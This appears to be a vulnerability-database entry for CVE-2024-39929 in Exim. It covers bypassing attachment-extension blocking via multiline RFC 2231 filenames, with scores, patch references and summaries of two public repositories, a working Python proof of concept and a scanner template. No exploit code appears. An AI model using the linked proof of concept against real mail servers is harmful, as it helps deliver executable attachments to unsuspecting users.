CVE-2024-39929

MEDIUM

Exim < 4.97.1 - Improper Encoding or Escaping of Output via Multiline RFC 2231 Header Filename

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2024-39929. PoCs published by michael-david-fry, rxerium.

AI-analyzed exploit summary The repository contains a functional Python script that exploits CVE-2024-39929 in Exim by sending a crafted email with a malformed attachment filename to bypass file extension blocking mechanisms. The PoC demonstrates the vulnerability by leveraging SMTP to deliver potentially executable attachments.

Description

Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users.

Exploits (2)

nomisec WORKING POC 5 stars

by michael-david-fry · poc

https://github.com/michael-david-fry/CVE-2024-39929

View Code ZIP pw:eip

The repository contains a functional Python script that exploits CVE-2024-39929 in Exim by sending a crafted email with a malformed attachment filename to bypass file extension blocking mechanisms. The PoC demonstrates the vulnerability by leveraging SMTP to deliver potentially executable attachments.

Classification

Working Poc 90%

Attack Type

Other

Complexity

Moderate

Reliability

Reliable

Target: Exim <= 4.97.1

No auth needed

Prerequisites: List of SMTP servers in a file · Python 3.x · Network access to target SMTP servers

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 18, 2026 Full analysis →

nomisec SCANNER 3 stars

by rxerium · poc

https://github.com/rxerium/CVE-2024-39929

View Code ZIP pw:eip

This repository contains a Nuclei template for detecting vulnerable Exim versions (up to 4.97.1) affected by CVE-2024-39929, which involves bypassing MIME filename extension blocking via multiline RFC 2231 header parsing. The template scans for Exim version banners but does not include exploit code.

Classification

Scanner 90%

Attack Type

Info Leak

Complexity

Trivial

Reliability

Reliable

Target: Exim through 4.97.1

No auth needed

Prerequisites: Network access to Exim SMTP service (ports 465/587)

MITRE ATT&CK

T1069.002 - Domain Groups

devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (5)

Core 5

Core References

Exploit, Vendor Advisory

https://bugs.exim.org/show_bug.cgi?id=3099#c4

Patch

https://git.exim.org/exim.git/commit/1b3209b0577a9327ebb076f3b32b8a159c253f7b

Patch

https://git.exim.org/exim.git/commit/6ce5c70cff8989418e05d01fd2a57703007a6357

Release Notes

https://github.com/Exim/exim/compare/exim-4.98-RC2...exim-4.98-RC3

Not Applicable

https://www.rfc-editor.org/rfc/rfc2231.txt

Scores

CVSS v3 5.4

EPSS 0.4123

EPSS Percentile 98.5%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CISA SSVC

Vulnrichment

Exploitation poc

Automatable no

Technical Impact partial

Details

CWE

CWE-116

Status published

Products (1)

exim/exim < 4.97.1

Published Jul 04, 2024

Tracked Since Feb 18, 2026